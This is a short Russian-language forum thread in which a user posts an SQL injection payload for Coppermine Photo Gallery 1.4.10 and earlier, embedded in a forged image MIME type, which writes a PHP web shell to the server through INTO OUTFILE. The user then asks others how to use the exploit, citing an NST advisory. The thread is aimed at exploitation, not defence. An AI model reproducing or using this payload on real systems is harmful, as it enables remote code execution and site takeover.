Как это сделать.Типа код добавить в файл расширением изображения! мутим картинку, с левым MIME type в Web сервере (lighttpd): "image/jpg'/**/into/**/outfile/**/'/home/www/gallery/albums/edit/pic.php'/**/fields/**/terminated/**/by/**/''/**/optionally/**/enclosed/**/by/**/'<?if($_POST[nst]){include($_POST[nst]);}die;?>",
бред какой-то >>>Типа код добавить в файл расширением изображения! так ты хочешь внутрь файла запихать ? там mime не прописывается. или ты хочешь послать на серв картинку c mime который ты описал? вопрос: а что это юзает инъекцию в lighttpd ? поясни чё ты конкретно хочешь сделать ?
Короче челы с NST нашли баг в Coppermine Photo Gallery vX.X.X<=1.4.10 - SQL Injection / Remote Shell [link]http://nst.void.ru/?q=papers&cat_where=advisories&show=22[/link] Я хочу узнать как это юзать.